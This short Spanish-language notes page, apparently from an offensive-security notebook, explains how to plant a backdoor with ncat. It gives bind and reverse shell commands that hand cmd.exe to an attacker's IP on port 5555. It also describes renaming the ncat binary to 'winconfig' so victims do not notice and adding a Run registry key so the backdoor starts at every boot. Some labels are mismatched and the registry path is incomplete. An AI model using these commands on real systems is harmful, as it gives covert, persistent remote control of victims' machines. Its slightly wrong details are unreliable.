Ncat
Backdoor usando la herramienta ncat
Victima a atacante
Esta comanda se ejecuta en la máquina victima, y la ponemos en modo listening por el puerto 5555 y ejecutamos una terminal. Sale winconfig por qué hemos cambiado el binario para que la victima no sospeche que tenemos la apliación ncat
Comando victima
ncat <IP victima> 5555 # tenemos acceso a la máquinaComando atacante
winconfig -l -p 5555 -e cmd.exeAtacante a victima
Comando atacante
En nuestra máquina atacante ejecutamos el comando que escuchará:
ncat -l -p 5555 -vComando victima
winconfig -e cmd.exe <nuestra IP> 5555Backdoor Persistence
Poner en: Regedit -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Run Creamos un nuevo archivo -> Winconfig
"<Donde\este\ncat\ncat.exe <nuestra IP> <puerto> -e cmd.exe"Esto hará que cada vez que se inicie el ordenador se ejecute el backdoor.
Last updated